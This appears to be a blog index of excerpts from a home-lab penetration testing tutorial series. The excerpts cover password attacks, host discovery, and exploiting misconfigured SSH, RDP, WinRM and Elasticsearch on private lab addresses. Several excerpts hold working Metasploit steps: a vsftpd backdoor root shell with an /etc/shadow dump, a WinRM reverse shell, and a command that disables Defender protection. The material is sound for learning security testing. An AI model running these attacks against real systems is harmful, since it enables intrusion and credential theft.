Introduction to Network Penetration Testing

In this chapter, we will cover the following topics:
• Exploring password-based attacks
• Performing host discovery
• Identifying and exploiting vulnerable services

Password-based attacks

Objectives:
• Gaining unauthorized access to remote hosts on a network by performing attacks against their authentication system
• Retrieving the password associated with cryptographic hashes
• Retrieving the password to access a password-protected sensitive file

Different types of password attacks:

Brute-force attack: In a brute-force attack, every possible combination is tried against the system. This is a very time-consuming process, as every possible password combination is tested against the authentication system of the target until the valid password is retrieved. While this method may seem to be the most thorough, it is often not achievable within the time constraints given for completing a penetration test.

Dictionary attack: In a dictionary attack, the threat actor uses a pre-populated wordlist that contains thousands or even millions of candidate passwords. These are tested against the authentication system of the target. Each word from the wordlist is tested; however, the attack will not be successful if the valid password is not present in the wordlist being used by the threat actor.

Password guessing: This is a common technique used by many people, including threat actors and penetration testers, who are attempting to gain unauthorized access to a system. I have often seen IT professionals use simple and even default passwords on their networking devices, security appliances, and even the client and server systems within their organization. For instance, by performing a Google dork using common default passwords, you will easily find default passwords for various systems. These default passwords are set by the manufacturer of the device.

Password cracking: In this technique, the threat actor uses various tools and techniques to retrieve valid user credentials to gain unauthorized access to a system. Sometimes, a threat actor may capture a user's password in transit across a network in plaintext over an insecure network protocol, or even retrieve the cryptographic hash of a password.

Password spraying: This is the technique where a threat actor uses a single password and tests it against an authentication system with different usernames. The password is a guessable password, obtained from data breaches or a wordlist. The idea is to test which user accounts within a specific list use the same password. This technique is good when testing which users

Credential stuffing: This technique allows a threat actor to use a common wordlist of usernames and passwords against the authentication system of a target host. This technique checks which combination of usernames and passwords leads to valid user credentials.

Online password attack: In an online password attack, the threat actor attempts to gain unauthorized access to a host that is running a network service or a remote access service, which allows authorized users to log in to the system across a network. A simple example of an online password attack is a threat actor attempting to retrieve the username and password of a valid user to gain access to a server that is running the Remote Desktop Protocol (RDP). Keep in mind that online password attacks focus on trying passwords from a wordlist directly against a web login page or network service interface until the correct one is found.

Offline password attack: In an offline password attack, the threat actor uses various tools and techniques to retrieve the valid password of a password-protected file, such as a document, or to recover the password from the cryptographic hash of a user's password. A simple example of this is capturing a domain administrator's username and password hash from network packets. The username is usually in plaintext, but you may need or want to retrieve the password from the hash value.

Important: SecLists is a collection of pre-built wordlists containing passwords and usernames that are commonly used by penetration testers to perform both online and offline dictionary attacks. Furthermore, SecLists contains URLs, sensitive data patterns, and fuzzing payloads, which are valuable to penetration testers. You can find the SecLists collections at https://github.com/danielmiessler/SecLists. Additionally, you can use the wordlists command within Kali Linux to view the local wordlist repository that is already pre-loaded within the operating system ...

November 24, 2025 · 5 min · 885 words · 0x-s0M3n4th

Misconfiguring SSH on Windows Server

OpenSSH is the open-source version of the Secure Shell (SSH) tools used by administrators of Linux and other non-Windows systems for cross-platform management of remote systems. Beginning with Windows 10 build 1809 and Windows Server 2019, OpenSSH is available as a feature on demand.

OpenSSH for Windows has the following commands built in:
• ssh is the SSH client component that runs on the user's local system
• sshd is the SSH server component that must be running on the system being managed remotely
• ssh-keygen generates, manages and converts authentication keys for SSH
• ssh-agent stores private keys used for public key authentication
• ssh-add adds private keys to the list allowed by the server
• ssh-keyscan aids in collecting the public SSH host keys from hosts
• sftp is the service that provides the Secure File Transfer Protocol, and runs over SSH
• scp is a file copy utility that runs over SSH

Prerequisites check: To validate your environment, open an elevated PowerShell session and do the following: ...

November 24, 2025 · 3 min · 619 words · 0x-s0M3n4th

Gaining Access by Exploiting SSH

Now that we have misconfigured SSH, we will exploit it using some basic techniques.

Scanning the target Windows server:

Performing user enumeration:
1. Open msfconsole.
2. Once it's loaded, use the ssh_enumusers module:
use auxiliary/scanner/ssh/ssh_enumusers
3. Settings: This gave no results because the OpenSSH server is secure; modern SSH servers are patched against this enumeration technique. If this were an actual pentest we would have hit a wall, but as we know the username and password, we can try login brute-force attacks ...

November 24, 2025 · 1 min · 160 words · 0x-s0M3n4th

Exploiting RDP

First we will enable it on our EXTERNAL-RED domain controller, aka the Windows Server 2019 machine. Fire up the VM and open Server Manager. Refresh the page; it should show Remote Desktop as enabled.

Imagine if a threat actor or penetration tester could retrieve valid user credentials to access the root Domain Controller (DC) of an organization. Here, the threat actor could potentially take over and control the Windows domain environment, such as its policies, users, groups, and device accounts. Additionally, a threat actor can attempt to gain unauthorized access to client systems that use shared user credentials and are connected to the company's domain through RDP, and further set up persistent access to each compromised device to expand their foothold on the network.

Let's start exploiting:
1. Open Kali.
2. Let's do a formal check of whether the target is visible on the network:
nmap -sn 192.168.83.0/24 --exclude 192.168.83.128
3. Identifying if RDP is running on the target 192.168.83.140 ...

November 24, 2025 · 3 min · 618 words · 0x-s0M3n4th

Live Host Discovery

Using Netdiscover:
sudo netdiscover -p -i <interface_name>   (for example, eth0)
-p : Passive mode.

Keep in mind that while passive network scanners help to maintain a level of stealth on a network, they don't always detect live systems as reliably as active scanning techniques. For instance, a targeted system may not be generating network traffic for many reasons. If a penetration tester is performing passive scanning only, there's a possibility the targeted host may not be identified. ...

November 24, 2025 · 1 min · 185 words · 0x-s0M3n4th

Identifying and Exploiting Vulnerable Services

Exploiting Linux-based systems:
1. Fire up the Metasploitable 2 Linux VM.
2. Scan the target using nmap:
nmap -A -p 21 172.30.1.134
Nmap was able to identify the service version of the FTP service as vsFTPd 2.3.4.
3. Search in Google for "vsftpd 2.3.4 exploit". There is an exploit module from Rapid7 itself.
4. Open up msfconsole:
sudo msfconsole
5. Run the module:
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 172.30.1.20
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
6. Upgrade the shell using the command:
python -c 'import pty; pty.spawn("/bin/bash")'
7. Got a root shell on the target system and dumped the /etc/shadow file, where the hashes of the users' passwords are stored.
8. Save the credentials into a text file, making sure to edit out the unnecessary users from the output: ...

November 24, 2025 · 5 min · 979 words · 0x-s0M3n4th

WinRM Configuration on Windows Server 2019

It is not recommended to add local accounts to Domain Controllers; they should be on workstations only. Use your Windows client machines, not the server. The steps should be similar to this practical.

By default, on Windows Server 2019, WinRM comes enabled. We can verify this through Server Manager as well as the CLI. Let's verify:

SERVER MANAGER:

POWERSHELL: The default port for WinRM is 5985.
# command
netstat -ano | findstr "5985"

The WinRM service starts automatically on Windows Server 2008 and later. On earlier versions of Windows (client or server), you need to start the service manually.

WinRM hardening: RESOURCE-BLOG ...

November 24, 2025 · 2 min · 276 words · 0x-s0M3n4th

WinRM Exploitation

In a Windows-based environment, IT professionals often require the ability to remotely manage and execute commands on other Windows-based devices. For this purpose, they rely on a common protocol or application like Web Services Management (WS-Management). WS-Management allows for the exchange of management information across different operating systems and services on a network. Notably, Microsoft has developed its own implementation of the WS-Management protocol, known as Windows Remote Management (WinRM), tailored specifically for Microsoft Windows operating systems.

Exploitation: Open Kali for scanning and exploitation. Open up msfconsole for the exploitation part:
sudo msfconsole
use auxiliary/scanner/winrm/winrm_cmd
msf auxiliary(scanner/winrm/winrm_cmd) > set RHOSTS 192.168.83.140
RHOSTS => 192.168.83.140
msf auxiliary(scanner/winrm/winrm_cmd) > set USERNAME Administrator
USERNAME => Administrator
msf auxiliary(scanner/winrm/winrm_cmd) > set PASSWORD P@ssword1
PASSWORD => P@ssword1
By default, the command that will be executed is ipconfig /all.

Remember the setup of the local user for WinRM access, where we gave access to the user sysadmin? Let's try that: It actually worked.

Now let's try for a remote shell:
msf6 > use exploit/windows/winrm/winrm_script_exec
msf6 exploit(windows/winrm/winrm_script_exec) > set RHOSTS 192.168.83.140
msf6 exploit(windows/winrm/winrm_script_exec) > set LHOST 192.168.83.128
Also turn off real-time protection on your Windows server, because it will quarantine the execution. Use this command in PowerShell on your DC:
Set-MpPreference -DisableRealtimeMonitoring $true
3. After selecting the exploit/windows/winrm/winrm_script_exec module, a reverse shell payload was automatically coupled with the exploit module within Metasploit.
4. For the exploit/windows/winrm/winrm_script_exec module to have a better chance of success, force the exploit module to use the VBS CmdStager option in case your target is an old system; if not, set it to false. Let's see the options: ...

November 24, 2025 · 2 min · 313 words · 0x-s0M3n4th

Setting Up Modern Vulnerable ElasticSearch

Requirements:

Step 1: Install Java JDK 17
Elasticsearch is a Java application and requires a Java Development Kit (JDK) to run. On your Windows Server 2019 VM, open the Edge browser you installed. Search for "OpenJDK 17 download" or "jdk 17 install" (Microsoft, Oracle, Red Hat, etc. are all good providers). Download the Windows x64 JDK as a .zip file (not the JRE). Once downloaded, extract the .zip file to a simple, permanent location, such as C:\Program Files\Java\jdk-17.

Step 2: Set the JAVA_HOME Environment Variable
This tells Windows where to find the Java installation. ...

November 24, 2025 · 3 min · 550 words · 0x-s0M3n4th

Exploiting ElasticSearch Misconfigurations

Through the previous misconfigurations, I should have full access to the Elasticsearch database. Let's see and exploit:

Reconnaissance of the database:
curl -X GET "http://192.168.83.140:9200"
curl -X GET "http://192.168.83.140:9200/_cat/indices?v"
_cat/indices: This is the API endpoint that lists all indices.
?v: This makes the output "verbose" (shows headers), so it's easy to read.
Why it's dangerous: This tells the attacker the names of all your databases, such as prod-users or customer-logs.

EXPLANATION OF THE INFO GATHERED FROM THE FIRST COMMAND:
"name" : "DC1" ...

November 24, 2025 · 7 min · 1297 words · 0x-s0M3n4th